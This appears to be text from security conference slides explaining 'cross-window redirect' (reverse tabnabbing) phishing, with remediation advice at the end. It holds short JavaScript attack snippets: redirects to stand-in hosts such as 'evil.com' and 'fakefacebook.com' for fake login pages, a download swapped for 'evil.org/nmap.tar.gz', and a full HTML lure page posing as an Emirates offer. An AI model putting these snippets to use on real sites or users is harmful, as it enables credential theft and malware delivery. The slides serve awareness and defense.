Cross Window Redirect

Khaled HawasliMichael Hendrickx

Who are we?• Khaled Hawasli– Manager Security Analysis @ HelpAG

• Michael Hendrickx– Security Analyst @ HelpAG

Preface• Social Engineering

becomes more sophisticated

• People don’t fall for the “click here” trick– Receive email with link– Click link– Presented with login

screen

Old tricks• www.facebook.com

Cross-Window Redirect• Exploiting opened windows using JS• Unknowingly hyperlink redirections• Works on all browsers• 2 Variants:– Child window redirect– Parent window redirect

Child window redirect• Control the link you just opened

Opens Gmail withwindow.open()

Redirect to fake phishing page

Parent Window

The attackers site (controlling window)

Child Window

The targeted site (controlled window)

childWindow = window.open(‘https://mail.google.com’);childWindow.location = ‘http://mail.google.com.evil.com/gmail/login.php’;

1

2

X-windows redirect demo• Let’s get malware to users– Let’s watch a movie– We need a movie player

http://michaelhendrickx.com/misc/sf.html

X-windows redirect explained• Link to SF to download software– Rewrite the link before the countdown

sf = window.open(‘http://sourceforge.net/...’);setTimeout(function(){ sf.location = ‘http://evil.org/nmap.tar.gz’;

}, 4000);

Multiple ways to attack this:• setTimeout():– Wait for a while and redirect the page.

• Interactive():– Server polling using XHR– Attacker can flip page on demand

• HTML5 Visibility API:– Flip page when user is not looking

https://github.com/ndrix/xwindow-redirect

Parent Window Redirect• “Evil child” can control the parent

1

Opens website with window.open()

Child redirects the parent

Parent Window

The targeted site (controlled window)

Child Window

The attacker site (controlling window)window.open(‘http://mywebsite.com’);

window.opener = ‘http://evil.com/gmail/login.php’;

Parent window redirect: demo• Emirates has some crazy deals!

(Click Facebook message)

Parent window redirect: demo• Emirates has some crazy deals!

<!DOCTYPE html><head><title>Crazy deals from Emirates.com</title></head><body><img src="ek.jpg"/><script>window.opener.location = 'http://fakefacebook.com’;window.location = 'http://www.emirates.com/ae/…';</script></body></html>

Parent window redirect: demo

• User may spend long enough on the target site, believing that Facebook timed out.

Parent Window Child Window1. open child with window.open()

2. Redirect facebook to fake “session logged out”

3. refresh itself to legitimate site

Other sites that use window.open()• Facebook, Amazon widget, …• GMail schema.org

Remediation• Don’t use window.open() to open hyperlinks– Those links may control your page

• Verify if your page was opened from another page– if(window.opener && !window.opener.closed){ ... }

• Preferably, browsers should use X-Frame-Options header for these JS links

Thank you!

Any questions?